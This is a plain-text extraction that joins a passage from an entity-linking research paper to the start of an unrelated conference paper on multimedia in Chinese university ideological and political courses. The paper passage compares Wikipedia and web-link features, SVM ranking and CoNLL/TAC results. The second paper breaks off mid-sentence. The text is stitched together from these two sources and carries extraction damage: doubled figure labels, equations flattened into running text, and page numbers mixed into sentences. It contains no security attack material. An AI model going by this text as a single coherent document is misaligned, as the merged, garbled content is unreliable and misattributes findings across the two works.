name n. We use existing conditional probability estimates from the DBpedia Lexicalizations data set (Mendes et al., 2012).2 This derives mentions from Wikipedia inter-article links, where names come from anchor text and referent entities from link targets. Estimates for entities that have fewer than five incoming links are discarded. We smooth these estimates using add- one smoothing. On the CoNLL development data, name probability alone achieves 69.2 p@1. 4.3 Textual context Textual context goes beyond intrinsic entity and name popularity, providing a means to distinguish between entities based on the words with which they occur. For example, references to Tesla the car manufacturer appear in passages with words like ‘company’, ‘electric’, ‘vehicle’. References to the inventor appear with words like ‘engineer’, ‘ac’, ‘electrical’. Textual context was the primary com- ponent of the top system in the first TAC evaluation (Varma et al., 2009), and is a key component in re- cent art (Ratinov et al., 2011; Radford et al., 2012). 2http://wiki.dbpedia.org/Downloads 148 http://wiki.dbpedia.org/Downloads BOW context We model textual context as a weighted bag of words (BOW), specifically as a term vector ~t containing tfidf weights: tfidf(t,p) = √ f(t,p) · log ( |D| |{d ∈D|t ∈ d}| ) where t is a term, p is a passage of text, f(t,p) is the term frequency of t in p, |D| is the total num- ber of documents, and {d ∈ D|t ∈ d} is the num- ber of documents containing t (Salton and Buckley, 1988). We derive the term frequency for an entity e from the corresponding article content in the Kopi- wiki plain text extraction (Pataki et al., 2012). Terms include three million token 1-3 grams from Mikolov et al. (2013), with the top 40 by document frequency as stop words. Candidate entities are scored using cosine distance between a mention context ~tm and the entity model ~te: fbow(m,e) = 1 − cos(~tm,~te) = 1 − ~tm ·~te ‖~tm‖‖~te‖ On the CoNLL development data, BOW context de- rived from Wikipedia article text achieves 50.6 p@1. We also build entity models from their mention con- texts, i.e., the combined text surrounding all incom- ing links. We project mentions into Kopiwiki article text, which yields more contexts than actual Wiki- pedia links. For an article a, we tag as mentions all aliases of entities linked to from a. We use aliases from Yago2 means relations (see Section 3.1). To ensure high precision, we only use aliases that are unambiguous with respect to the outlink set, have a length of at least two characters, include at least one upper-case character, and are not a member of the NLTK stop list. This is a noisy process, but gives us a pivot to assess whether differences observed later between Wikipedia and Web link models are due the way the context is modelled or the source of the con- text. The term frequency for an entity e is calculated over the concatenation of all contexts for e. BOW context derived from mentions achieves 55.8 p@1 on the CoNLL development data, five points higher than article text. DBOW context While BOW context models have been very successful, they require exact matching between terms and a large vocabulary. Distribu- tional approaches model terms or concepts as se- mantic vectors (Pereira et al., 1993). Dimensional- ity reduction and deep learning improve generalisa- tion and reduce vector size (Baroni et al., 2014). He et al. (He et al., 2013) report excellent performance using entity representations that optimise the simi- larity between mention contexts and article text in Wikipedia. However, this approach necessitates an expensive training process and significant run-time complexity. We introduce a simple distributed bag- of-words (DBOW) model that represents context as the tfidf-weighted average over word vectors V: ~vp = 1 |Tp| ∑ t∈Tp tfidf(t,p) ·~vt where Tp is the set of terms in passage p, and ~vt ∈V is the learnt word vector for term t. We use existing 300-dimensional word embeddings (Mikolov et al., 2013) and score candidates using cosine distance be- tween mention context ~vm and the entity model ~ve: fdbow(m,e) = 1 − cos(~vm,~ve) On the CoNLL development data, DBOW context models derived from article text and mention con- text achieve 49.9 and 51.2 respectively. 5 Web link models The models above all have direct anologues in web links to Wikipedia articles. However, web links are a comparatively noisy source. For instance, anchors are less likely to be well-formed entity mentions, e.g., in links to Semantic Web we observe ‘se- mantic markup’ and ‘Semantic Web Activity’ as an- chors. A lack of curation and quality control also allows for the misdirection of links. For exam- ple, we observe links to Apple the fruit where the surrounding context indicates an intention to link Apple Inc instead. It is an open question whether link-derived models are effective in disambiguation. Below, we describe how models are instantiated using link data. We leverage the Wikilinks corpus of 9 million web pages containing a total of 34 mil- lion links to 1.7 million Wikipedia pages (Singh et al., 2012). This includes links to English Wikipedia pages that pass the following tests: (1) the page must not have >70% of sentences in common with a Wikipedia article; (2) the link must not be inside 149 Wikipedia Web links Pages 8.7m 9.0m Entities 8.9m 1.7m Pairs 100.3m 31.2m Table 3: Comparison of page-entity link graphs from Wikipedia and Wikilinks (in millions). These graphs are the basis for entity prior features (Sections 4.1, 5.1). a table, near an image, or in obvious boilerplate ma- terial; (3) at least one token in the anchor text must match a token in the Wikipedia title; and (4) the an- chor text must match a known alias from Wikipedia. The corpus provides the web page URL, the link an- chor, and local textual content around each link. Refer back to Table 2 for p@1 results for individ- ual Web link components on the development data. 5.1 Entity prior To instantiate fprior, we build a page-entity link graph from Wikilinks. Where pages and entities are the same in the Wikipedia graph, here we have an unweighted bipartite graph of links from web pages to Wikipedia articles. On the CoNLL development data, the link-derived entity prior achieves 63.0 p@1. Table 3 characterises the two graphs. Note that the high entity count for Wikipedia here includes red links to articles that do not exist. The actual number of entities used in the Wikipedia model is 4.4 mil- lion. Nevertheless, while the two graphs have a sim- ilar number of pages that contain links, Wikipedia includes three times as many link pairs to 2.5 times as many entities. Furthermore, entities average 11.5 incoming links in the Wikipedia graph, compared to 3.5 in the Wikilinks graph. Nevertheless, the indi- vidual performance of the Web link prior is only 5.4 points shy of the corresponding Wikipedia prior. Relative frequencies in Wikipedia and Wikilinks are similar, especially for entities that show up in the evaluation data. We observe a moderate correla- tion between entity priors from Wikipedia and Wik- ilinks (ρ = 0.51, p < 0.01), and a strong correlation across the subset of entities that occur in the devel- opment data (ρ = 0.74, p < 0.01). 5.2 Name probability To instantiate fname, we build a name-entity graph from Wikilinks. The structure is the same as the cor- Wikipedia Web links Names 1.4m 3.1m Entities 1.5m 1.7m Table 4: Comparison of name-entity link graphs from Wikipedia and Wikilinks (in millions). These graphs are the basis for name probability features (Sections 4.2, 5.2). responding model from Wikipedia, both are bipar- tite graphs with cooccurrence frequencies on edges. However, names here are sourced from link anchors in web pages rather than Wikipedia articles. For comparability with the Wikipedia model, we ignore links to entities that occur fewer than five times. We observed no improvement using all links in develop- ment experiments. On the CoNLL development data, link-derived name probability achieves 58.4 p@1, more than ten points shy of the Wikipedia-derived name probability. Table 4 helps to explain this dif- ference. Wikilinks has twice as many names linking to the same number of entities, resulting in more am- biguity and sparser models. 5.3 Textual context To instantiate fbow and fdbow, we follow the same methodology used for Wikipedia mention contexts. The term frequency for an entity e is calculated over the concatenation of mention contexts for e. Docu- ment frequency is also calculated across aggregated entity contexts. Mention contexts include all text in- cluded in the Wikilinks data, a window of 46 tokens on average centred on the link anchor. Section 4.3 showed that Wikipedia mention contexts give bet- ter individual performance than Wikipedia article texts. Web link mentions result in even better per- formance. On the CoNLL development data, BOW context achieves 62.2 p@1, ten points higher than commonly used Wikipedia article model and seven points higher than the analogous Wikipedia mention model. DBOW context achieves 54.0 p@1, 2.8 points higher than the Wikipedia mention model. Table 5 compares Wikipedia and Wikilinks cov- erage of entities from the CoNLL development set. The second column (|E|) contains the number of unique entities that have usable context. Note that the entity universe we consider here is all article pages in English Wikipedia (4,418,901 total from the December 2013 Kopiwiki data set). The third 150 |E| CovE CovM Joint Articles 4,418,901 100 100 51.1 Mentions 954,698 77 89 58.3 Web links 1,704,703 82 92 64.1 Table 5: Coverage of textual context models for each source over entities (E) and mentions (M). t̄E t̄M Articles 438 438 Mentions 1653 50 Web links 922 46 Table 6: Mean in-vocab tokens per entity (t̄E ) and tokens per mention (t̄M) for each textual context model. and fourth columns correspond to coverage of enti- ties (CovE) and mentions (CovM) from the CoNLL data set. Mention coverage exceeds entity cover- age, highlighting the relationship with prevalence in newswire. The last column contains p@1 for the subset of mentions in CoNLL for which the correct resolution is covered by both articles and web links. This isolates context source, demonstrating that link contexts outperform article text. Table 6 compares context size in Wikilinks to Wikipedia. Wikilinks BOW models are approxi- mately twice the size of Wikipedia article models and half the size of Wikipedia mention models. This helps to explain why individual mention and link models outperform individual article models. 6 Learning to rank To perform disambiguation, we first extract a set of real-valued features for each candidate entity e given a training set of mentions M. Features values are standardised to have zero mean and unit variance. Parameters of the training distribution are saved for consistent standardisation of test data. We train a Support Vector Machine (SVM) clas- sifier to perform pairwise ranking (Joachims, 2002). For each mention in the training set, we derive train- ing instances by comparing the feature vector of the gold link ( ~fg) with each non-gold candidate ( ~fc): (xi,yi) = { (~fg − ~fc, +) if i is odd (~fc − ~fg,−) otherwise Articles (i) Mentions (i) Web links (i) Articles (c) Mentions (c) Web links (c) Combined (c) Optimal (c) priorprior namename bowbow dbowdbow 5050 6060 7070 8080 9090 featuresfeatures p @ 1 p @ 1 Figure 1: Individual (i) and cumulative (c) results for ba- sic features on the CoNLL development data. Combined includes all features while Optimal includes the best sub- set. Optimal tracks Combined closely, but is just higher. We create instances for the top-ten non-gold candi- dates by sum of absolute feature values: activation(c) = |~fc|∑ i=1 |~fc,i|. In development experiments, this outperformed ran- dom selection and difference in activation. Class as- signment is alternated to balance the training set. To capture non-linear feature relationships we in- corporate a degree-2 polynomial kernel via explicit feature mapping (Chang et al., 2010). Regularisa- tion parameters are selected via grid search over the development set. Our final model utilises an L1 loss function, L2 weight penalty and C ≈ 0.03. 6.1 Feature selection Sections 4 and 5 describe a total of ten model com- ponents, six from Wikipedia and four from Wik- ilinks. We select the optimal combination through exhaustive search. Figure 1 includes individual and cumulative results on the CoNLL development data. The article, mention and web link models each at- tain their best performance with all component fea- tures (entity, name, BOW, and DBOW): 84.7, 81.1, and 75.0 respectively. Adding mention context fea- tures doesn’t improve the more conventional Wiki- pedia article model. Combining all features gives 87.7, while the optimal configuration achieves 88.1 without Wikipedia mention contexts. In the remain- ing experiments, optimal refers to Wikipedia article 151 Wikipedia Web links Optimal 10001000 60006000 1100011000 1600016000 7070 7575 8080 8585 9090 # training mentions# training mentions p @ 1 p @ 1 Figure 2: SVM learning curves for best configurations. plus web link features and Wikipedia refers to article features alone. 6.2 Effect of training data size Figure 2 compares learning curves for each model on CoNLL development data. The x-axis corre- sponds to p@1 scores and the y-axis corresponds to the number of (randomly selected) mentions used in training. All models stabilise early, suggesting 6,000 annotated mentions are sufficient for the SVM to learn feature weights. Possibly due to higher qual- ity and consistency of features, the Wikipedia model stabilises earlier, before 1,000 annotated mentions. 6.3 Ablation analysis Figure 3 contains an ablation analysis for Wikipedia and Web link features, as well as the optimal over- all combination of both. The most striking effect is due to the popularity components. Removing en- tity prior features reduces p@1 by 3.2 for Wikipedia and 5.0 for Web link. Removing name probability reduces p@1 by 6.5 for Wikipedia and 1.8 for Web link. In the overall model, the Wikipedia popularity components have a much larger impact (prior: -3.2, name: -4.2) than the Web link popularity compo- nents (prior: -0.4, name: -0.8). These results show the impact of noisy web links, which appears to be worse for name probability modelling. For context, removing DBOW features have a larger impact than BOW for both Wikipedia (BOW: -0.2, DBOW: -1.3) and Web link (BOW: -0.9, DBOW: -1.4). All indi- vidual context features have a small impact on the overall model despite redundancy. Wikipedia Web links Optimal -8-8 -6-6 -4-4 -2-2 00 Wikipedia priorWikipedia prior Wikipedia nameWikipedia name Article bowArticle bow Article dbowArticle dbow Web link priorWeb link prior Web link nameWeb link name Web link bowWeb link bow Web link dbowWeb link dbow ∆ p@1∆ p@1 fe a tu re s fe a tu re s Figure 3: Ablation analysis of best configurations. 7 Adding coherence The model combinations above provide a strong, scalable baseline based on popularity and entity con- text. Another approach to context leverages the Wikipedia link graph to explicitly model the co- herence among possible resolutions. Here, sys- tems define some measure of entity-entity related- ness and maximise the coherence of entity assign- ments across the query document as a whole. This can be done using global methods over the entity link graph (Hoffart et al., 2011), but these have high runtime complexity. We employ a simple approach based on conditional probabilities: pcoh(a|b) = |Ia ∩Ib| |Ib| where Ie is the set of documents that link to entity e. The candidate-level feature is the average: fcond(e) = 1 |C| ∑ c∈C log pcoh(e|c) where C is the set of context entities for candidate entity e. For Wikipedia and Web link coherence, Ie models are derived respectively from the set of other articles that link to e and from the set of web pages that link to e. Given the same initial ranking from the optimal base model, Wikipedia and Web link co- herence models alone achieve 84.7 and 76.6. 7.1 A two-stage classifier To incorporate coherence, we use a two-stage clas- sifier. First, we obtain an initial candidate ranking for each mention using the basic model described 152 (a) CoNLL (b) TAC 10 Pop Ctx Pop Ctx Wikipedia 73.9 53.3 72.6 65.0 Web links 62.5 60.8 73.3 75.3 Table 7: Web link components vs. Wikipedia. in Section 6 above, and populate C from the top- one candidate for each unique context name. A sec- ond classifier incorporates all features, including ba- sic components and coherence. Given the same ini- tial ranking, adding coherence improves individual Wikipedia and Web link models 4.5 and 6.4 points to 89.2 and 81.4 p@1 on the CoNLL development data. These results suggests that coherence is a powerful feature to overcome low scores in the basic Web link model. But, coherence only improves the optimal combination of basic Wikipedia and web link fea- tures by 1.1 point to 89.2. This suggests coherence may not contribute much on top of an already strong set of basic features. 8 Final experiments We report final experiments on the held-out CoNLL and TAC 2010 test sets. As described in Section 3 above, we report p@1 for CoNLL following Hof- fart et al. (2011) and AKB for TAC following He et al. (2013). We use a reference implementation to compute evaluation measures and pairwise signifi- cance (Hachey et al., 2014). We bold the superior configuration for each column only if the difference is significant (p < 0.05). 8.1 Results Can link components replace KB components? Table 7 compares performance of basic model com- ponents. The popularity (Pop) column contains re- sults using just entity prior and name probability fea- tures. The context (Ctx) column contains results using just BOW and DBOW features. Results fol- low trends observed in development experiments. Specifically, Wikipedia popularity models are bet- ter, but web link context models are better. Inter- estingy, web link popularity is significantly indis- tinguishable from Wikipedia popularity on TAC 10 data. This may be attributed to the fact that TAC se- lectively samples difficult mentions. (a) CoNLL (b) TAC 10 Base +Coh Base +Coh Wikipedia 82.7 84.9 78.6 80.2 Web links 77.0 80.7 78.5 80.2 Table 8: Web link combinations vs. Wikipedia. (a) CoNLL (b) TAC 10 Base +Coh Base +Coh Wikipedia 82.7 84.9 78.6 80.2 + Web links 86.1 88.7 79.6 80.7 Table 9: Web links complement Wikipedia. Can links replace a curated KB? Table 8 com- pares performance of the Wikipedia and Web link systems using the basic feature set alone and with coherence. Wikipedia models generally perform better. However, the Web link configurations per- form at 93.1, 95.1, 99.9, and 100% of the Wikipedia linker – 97% on average. This suggests that a link data set can replace a curated KB, with only a small impact on accuracy. Results also show that adding coherence improves performance in all cases. Do links complement article text? Table 9 com- pares a standard Wikipedia-only model to a model that also includes features derived from Web link data. Adding Web link data has a strong impact on CoNLL, improving both configurations by approxi- mately 4 points. We observe less impact on TAC. Nevertheless, the large improvements on CoNLL provide good evidence for complementarity and rec- ommend using both feature sets when available. The state of the art Finally, Table 10 compares our Wikipedia and Web link combinations to state- of-the-art numbers from the literature. First, we note that adding coherence to our base model results in a significant improvement on CoNLL test data, but not on TAC 2010. For comparison the literature, we re- port 95% confidence intervals. If a confidence bar overlaps a reported number, the difference can not be assumed significant at p < 0.05. Results on TAC 10 are competitive with He et al.’s (2013) 81.0. On the CoNLL data, our best system achieves 88.7 p@1– a new state of the art. Furthermore, the best base model is competitive with previous art that uses complex collective approaches to coherence. 153 DEV CoNLL TAC 10 Base model 87.7 86.1 79.6 - 95% CI [85.3, 90.0] [83.1, 88.8] [77.1, 82.1] Base+Coh 89.4 88.7 80.7 - 95% CI [87.3, 91.2] [86.2, 90.9] [78.2, 83.1] Hoffart 79.3 82.5 — Houlsby 79.7 84.9 — He — 85.6 81.0 Alhelbawy — 87.6 — Table 10: Comparison to the disambiguation literature. 9 Discussion We set out to determine whether links from exter- nal resources can replace a clean, curated KB. Wiki- pedia is an incredible resource that has advanced our understanding of and capabilities for identifying and resolving entity mentions. However, it covers only a small fraction of all entities. Applications that re- quire other entities must therefore extend Wikipedia or use alternative KBs. We explore a setting where a custom KB is required, but it is possible to har- vest external documents with links into the custom KB. Overall, results are promising for using links in a knowledge-poor setting. The link-derived sys- tem performs nearly as well as the rich-KB system on both of our held-out data sets. Web link combinations perform at 97% of Wiki- pedia combinations on average. However, creating a KB as rich as Wikipedia represents an estimated 100 million hours of human effort (Shirky, 2010). We do not have a comparable estimate for the Web link data. However, it is created as byproduct of publish- ing activities and the labour pool is external. Con- sidering this and the additional noise in web data, it is remarkable that the Web link models do so well with respect to the Wikipedia models. We also present detailed experiments compar- ing popularity, context, and coherence components across settings. Here, results are even more surpris- ing. As expected, Web link popularity and coher- ence models trail Wikipedia models. However, Web link context models outperform Wikipedia context models by 7 to 10 points. We add the Web link components into the Wiki- pedia system to achieve, to our knowledge, the best published result of 88.7 on the CoNLL data set. Fur- thermore, results suggest that coherence modelling does not require complex global graph algorithms. Our simple approach improves performance over the basic model by one to three points. On the other hand, our basic system without coherence modelling approaches state-of-the-art performance on its own. This suggests that additional popularity and con- text features from web links can replace coherence where efficiency is a concern. We believe these results have a number of impli- cations for management of entity KBs. First, they motivate concerted efforts to link content to KBs since links lead to substantial accuracy improve- ments over a conventional model based on rich KB data alone. Second, it informs allocation of editorial resources between interlinking data sets and curat- ing KBs. Since models built from link data alone ap- proach state-of-the-art performance, curating links is a reasonable alternative to curating a KB. This is especially true if link curation is cheaper or if links can be created as a byproduct of other content au- thorship and management activities. Finally, where KB data is currently proprietary, results here motivate openly publishing KB entities and encouraging their use as a disambiguation end- point for public content. In addition to providing pathways to paid content, incoming links provide a simple means to harvest rich metadata from external content and this can be used to build high-quality resolution systems. A key avenue for future work is to evaluate how well our approach generalises to other web KBs. For instance, incorporating links to sites like Freebase or IMDb which complement or extend Wikipedia’s entity coverage. 10 Conclusion Despite widespread use in entity linking, Wikipedia is clearly not the only source of entity information available on the web. We demonstrate the potential for web links to both complement and completely replace Wikipedia derived data in entity linking. This suggests that, given sufficient incoming links, any knowledge base may be used for entity linking. We argue that this motivates open publishing of en- terprise KBs. Code is available under an MIT license at https://github.com/wikilinks/nel. 154 https://github.com/wikilinks/nel Acknowledgments Andrew Chisholm is supported by a Google Fac- ulty Research Award. Ben Hachey is the recipient of an Australian Research Council Discovery Early Career Researcher Award (DE120102900). References Ayman Alhelbawy and Robert Gaizauskas. 2014. Graph ranking for collective named entity disambiguation. In Annual Meeting of the Association for Computational Linguistics, pages 75–80. Marco Baroni, Georgiana Dinu, and Germán Kruszewski. 2014. Don’t count, predict! a systematic compari- son of context-counting vs. context-predicting seman- tic vectors. In Annual Meeting of the Association for Computational Linguistics, pages 238–247. Yin-Wen Chang, Cho-Jui Hsieh, Kai-Wei Chang, Michael Ringgaard, and Chih-Jen Lin. 2010. Training and testing low-degree polynomial data mappings via linear SVM. Journal of Machine Learning Research, 11:1471–1490. Silviu Cucerzan. 2011. TAC entity linking by perform- ing full-document entity extraction and disambigua- tion. In Text Analysis Conference. Jeffrey Dalton and Laura Dietz. 2013. UMass CIIR at TAC KBP 2013 entity linking: query expansion using Urban Dictionary. In Text Analysis Conference. Paolo Ferragina and Ugo Scaiella. 2010. TAGME: On-the-fly annotation of short text fragments (by Wikipedia entities). In International Conference on Information and Knowledge Management, pages 1625–1628. Jiafeng Guo, Gu Xu, Xueqi Cheng, and Hang Li. 2009. Named entity recognition in query. In International Conference on Research and Development in Informa- tion Retrieval, pages 267–274. Ben Hachey, Will Radford, Joel Nothman, Matthew Hon- nibal, and James R. Curran. 2013. Evaluating en- tity linking with Wikipedia. Artificial Intelligence, 194:130–150. Ben Hachey, Joel Nothman, and Will Radford. 2014. Cheap and easy entity evaluation. In Annual Meet- ing of the Association for Computational Linguistics, pages 464–469. Xianpei Han and Le Sun. 2011. A generative entity- mention model for linking entities with knowledge base. In Annual Meeting of the Association for Com- putational Linguistics, pages 945–954. Xianpei Han, Le Sun, and Jun Zhao. 2011. Collective entity linking in web text: a graph-based method. In International Conference on Research and Develop- ment in Information Retrieval, pages 765–774. Zhengyan He, Shujie Liu, Mu Li, Ming Zhou, Longkai Zhang, and Houfeng Wang. 2013. Learning entity representation for entity disambiguation. In Annual Meeting of the Association for Computational Linguis- tics, pages 30–34. Johannes Hoffart, Mohamed Amir Yosef, Ilaria Bordino, Hagen Fürstenau, Manfred Pinkal, Marc Spaniol, Bilyana Taneva, Stefan Thater, and Gerhard Weikum. 2011. Robust disambiguation of named entities in text. In Conference on Empirical Methods in Natural Lan- guage Processing, pages 782–792. Johannes Hoffart, Yasemin Altun, and Gerhard Weikum. 2014. Discovering emerging entities with ambiguous names. In International World Wide Web Conference, pages 385–396. Heng Ji and Ralph Grishman. 2011. Knowledge base population: Successful approaches and challenges. In Annual Meeting of the Association for Computational Linguistics, pages 1148–1158. Yuzhe Jin, Emre Kcman, Kuansan Wang, and Ricky Loynd. 2014. Entity linking at the tail: Sparse sig- nals, unknown entities, and phrase models. In Inter- national Conference on Web Search and Data Mining, pages 453–462. Thorsten Joachims. 2002. Optimizing search engines us- ing clickthrough data. In International Conference on Knowledge Discovery and Data Mining, pages 133– 142. Yang Li, Chi Wang, Fangqiu Han, Jiawei Han, Dan Roth, and Xifeng Yan. 2013. Mining evidences for named entity disambiguation. In International Conference on Knowledge Discovery and Data Mining, pages 1070– 1078. Edgar Meij, Wouter Weerkamp, and Maarten de Rijke. 2012. Adding semantics to microblog posts. In Inter- national Conference on Web Search and Data Mining, pages 563–572. Pablo N. Mendes, Max Jakob, and Christian Bizer. 2012. DBpedia: A multilingual cross-domain knowledge base. In International Conference on Language Re- sources and Evaluation, pages 1813–1817. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S Cor- rado, and Jeff Dean. 2013. Distributed representations of words and phrases and their compositionality. In Advances in Neural Information Processing Systems, pages 3111–3119. David Milne and Ian H. Witten. 2008. Learning to link with Wikipedia. In Conference on Information and Knowledge Management, pages 509–518. Ndapandula Nakashole, Tomasz Tylenda, and Gerhard Weikum. 2013. Fine-grained semantic typing of 155 emerging entities. In Annual Meeting of the Associa- tion for Computational Linguistics, pages 1488–1497. Máté Pataki, Miklós Vajna, and Attila Marosi. 2012. Wikipedia as text. ERCIM News, (89):48–49. Fernando Pereira, Naftali Tishby, and Lillian Lee. 1993. Distributional clustering of English words. In Annual Meeting of the Association for Computational Linguis- tics, pages 183–190. Francesco Piccinno and Paolo Ferragina. 2014. From TagME to WAT: a new entity annotator. In SIGIR Workshop on Entity Recognition and Disambiguation, pages 55–62. Will Radford, Will Cannings, Andrew Naoum, Joel Noth- man, Glen Pink, Daniel Tse, and James R. Curran. 2012. (Almost) Total Recall – SYDNEY CMCRC at TAC 2012. In Text Analysis Conference. Will Radford. 2014. Named entity linking using rich knowledge. Ph.D. thesis, The University of Sydney. Lev Ratinov, Dan Roth, Doug Downey, and Mike Ander- son. 2011. Local and global algorithms for disam- biguation to Wikipedia. In Annual Meeting of the As- sociation for Computational Linguistics, pages 1375– 1384. Gerard Salton and Christopher Buckley. 1988. Term- weighting approaches in automatic text retrieval. In- formation Processing and Management, 24(5):513– 523. Wei Shan, Jiawei Han, and Jianyong Wang. 2014. A probabilistic model for linking named entities in web text with heterogeneous information networks. In In- ternational Conference on Mangement of Data, pages 1199–1210. Wei Shen, Jianyon Wang, and Jiawei Han. 2014. Entity linking with a knowledge base: Issues, techniques, and solutions (to appear). Transactions on Knowledge and Data Engineering. Clay Shirky. 2010. Cognitive surplus: Creativity and generosity in a connected age. Allen Lane, London. Sameer Singh, Amarnag Subramanya, Fernando Pereira, and Andrew McCallum. 2012. Wikilinks: A large- scale cross-document coreference corpus labeled via links to Wikipedia. Technical Report UM-CS-2012- 015, University of Massachusetts. Merine Thomas, Hiroko Bretz, Thomas Vacek, Ben Hachey, Sudhanshu Singh, and Frank Schilder. 2014. Newton: Building an authority-driven company tag- ging and resolution system (in press). In Emma Tonkin and Stephanie Taylor, editors, Working With Text: Tools, techniques and approaches for text min- ing. Chandos, Oxford, UK. Erik F. Tjong Kim Sang and Fien De Meulder. 2003. In- troduction to the CoNLL-2003 shared task: Language- independent named entity recognition. In Conference On Computational Natural Language Learning, pages 142–147. Vasudeva Varma, Praveen Bysani, Kranthi Reddy, Vijay Bharat, Santosh GSK, Karuna Kumar, Sudheer Kove- lamudi, Kiran Kumar N, and Nitin Maganti. 2009. IIIT Hyderabad at TAC 2009. In Text Analysis Con- ference. 156 work_njhxoq7ltbf4pdaovqxbwx56nu ---- The Reform and Innovation of Ideological and Political Teaching Under the Multimedia 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 122 The Reform and Innovation of Ideological and Political Teaching Under the Multimedia Xing Bo Ideological and Political Department Xi’an Peihua University Xi’an, 710125, Shaanxi, China e-mail: 932587282@qq.com Abstract—With the continuous development of modern information technology, Computer network and multimedia technology have been used more and more widely. Due to the diversity, integration, control, interactivity, and real-time characteristics of multimedia technology, the application of multimedia technology in teaching has greatly changed the traditional teaching mode of instilling knowledge to students in a single way and in a simple manner. It used its super integrated management of text, text, graphics, images, video, sound etc., making teaching intuitive, novelty, diversity and vivid characteristics, can give full play to the students' thinking ability, cognitive ability and the ability to analyze problems, greatly improve the quality of teaching. Applying multimedia technology to the ideological and political course in colleges and universities can help improve the expressiveness and appeal of teaching content, inspire students' interest in learning, increase the credibility and timeliness of teaching content, and create a multidimensional interactive ideological and political classroom model. This will enable the teaching of ideological and political courses in universities to be carried out more effectively. Therefore, we should effectively use multimedia technology to assist our teaching in ideological and political education. Keywords-Multimedia Technology; Ideological and Political Courses in Colleges and Universities; Reform Strategy I. INTRODUCTION With the extensive application of multimedia technology in the teaching class, the ideological and political teaching in Colleges and universities has radiate new vitality and vitality, from the traditional chalk into today's participatory teaching, from the traditional single teaching mode into today's multi-dimensional interactive teaching mode, greatly improve the efficiency of ideological and political course teaching. But at the same time, it may inevitably bring about many problems, for these exist in the ideological and political class multimedia technology problems, the author puts forward some solving strategies, believe that such a tool as long as reasonable use of multimedia technology, the ideological and political education in colleges and universities can become more productive. Figure 1. Network multimedia technology assisted teaching map II. THE ROLE OF MULTIMEDIA TECHNOLOGY IN THE TEACHING OF IDEOLOGICAL AND POLITICAL COURSES A. Motivate students' interest in learning In traditional ideological education courses, teachers often use sermon teaching mode, which makes classroom teaching boring and boring, so that class becomes a teacher's "one-man show", so that students lack enthusiasm and initiative, and classroom participation is extremely low. Those students often do not know after class, so the quality and efficiency of teaching can not be achieved well. The famous Chinese educator Confucius once said, "people who understand it are not as good as those who love it, and those who love it are not as good as those who enjoy it." The interest of learning can awaken the students' thirst for knowledge and thus improve the students' learning efficiency. Therefore, the ideological and political classroom with a relatively dull content should pay more attention to improving the students' interest and stimulating the curiosity of the students. With the use of new media technology, 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 123 teachers can transform teaching contents into images, sounds and characters by making PPT and so on. This relatively more novel and lively teaching methods, to help students use all kinds of sense organs participate in teaching activities, passively accept to active learning, make the ideological and political education is more interesting and stimulate the students interest in learning for ideological and political education. B. Enhancing the credibility and timeliness of teaching content In the traditional ideological and political education class, because most of the teachers adopt the way of oral teaching, many of the views in the textbook are not so convinced by the students. But the multimedia can go beyond the limitations of time and space, make originally not intuitive knowledge of ideological and political teaching illustrated, by taking advantage of the news, documentaries, the chart data added the textbook knowledge, make both organically, let the students "seeing is believing", greatly increase the credibility of the teaching content. The ideological and political course in Colleges and universities is a curriculum which pays great attention to timeliness. However, textbook reprinting is a very time-consuming and laborious process. This leads to the fact that only by learning textbooks cannot be made of the effect of ideological and political education to keep pace with The Times .However, in the era of information technology, this situation has a new method of improvement, that is, the use of multimedia technology to innovate ideological and political education class. Because multimedia has the dynamic function of spreading the political, economic, cultural and social situations in the world, so teachers can take all kinds of current hot topics on the Internet as examples, keep pace with the social reality, and make ideological and political education advance with the times. C. Deepening students' understanding of ideological and political issues A large part of the ideological and political problems are very abstract, and it is often difficult to be understood by the students immediately through the teacher's explanation. For example, it is very difficult for students to understand the "law is the inevitable connection of things, phenomena and processes", but by listing some occasional events by pictures, it is easy to deepen students' understanding of this concept through asking and answering questions with students. In fact, many abstract problems in Ideological and political education can be solved by similar multimedia technology. Because of the intuitive features of the multimedia technology itself, it can easily establish the connection between the content and life, and create a life situation related to the teaching content. It enables students to better understand some abstract ideological and political problems, so that students can master the difficult points in the ideological and political process without difficulty, and improve the teaching quality and efficiency of teachers. Figure 2. Multimedia technology assisting the teaching process of Ideological and Political Course D. Improving students' memory of teaching content The so-called memory "is the process of encoding, storing and extracting the input information of the outside world, which is divided into three types: instantaneous memory, short-term memory and long-term memory." In the process of ideological and political teaching, how to make the students' memory of teaching content disappear in the darkness after the "registration" in the mind, and even to the point that they have not forgotten for a long time, it has been the common pursuit of all teachers. The new media technology using the echoism tone even dynamic video several angles to promote the students' memory in teaching content, and there is conducive to students through a variety of ways to extract content. Let students "bind" what they have learned in various ways to common knowledge, increase the retention rate of students' knowledge, and improve the efficiency of education teaching. III. THE PROBLEMS OF THE APPLICATION OF NEW MEDIA TECHNOLOGY IN THE IDEOLOGICAL EDUCATION COURSE A. The content of multimedia courseware is not closely related to the teaching material Teaching materials are a basic basis for teachers' learning, so the courseware made by teachers should be based on teaching materials. However, in the college ideological education class, some teachers pay too much attention to the novelty of courseware, so that they ignore the basic principles of teaching materials. Multimedia technology is only a supporting tool for teaching, and it is a means for teachers to better illustrate the viewpoint of teaching materials. Making courseware out of teaching materials is not only a kind of behavior that is not only to the end of the book, but also may affect the students' attention to the teaching content and hinder the students' understanding of the teaching material. In addition, in ideological education 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 124 courses in colleges and universities, the classroom teaching is only through the courseware is very serious, teachers control the multimedia courseware to recite, rather than lead students to comprehend teaching materials, the teaching process is completely out of teaching materials. In this way, not only the teacher's subjective status in the teaching is weakened, but also the humanistic care in the ideological and political teaching material can not be read. In the long run, the harm is great. B. The concept of teachers is old and multimedia becomes formalism Contrary to the multimedia as the center, the ideological education in colleges and universities also exist such teachers, they ignore the role of multimedia in modern teaching. They always insist on teaching by preaching. They believe that the traditional way of teaching is simpler and easier to write and say. A survey shows that there is such a general situation in Colleges and universities that some teachers never use multimedia technology in the normal teaching process. Only when public courses are exchanged, can they open multimedia in the classroom for a long time. In this case, multimedia technology is reduced to a formalism. This situation is particularly prominent in the ideological and political teaching. In addition, the imperfect multimedia facilities in Colleges and universities are also one of the reasons for this phenomenon. C. Teachers become manipulators of machines, weakening students' subjectivity In the process of using ideological and political education with multimedia technology, because the courseware is prepared in advance, the teacher pays great attention to the whole context of the courseware, which leads to the 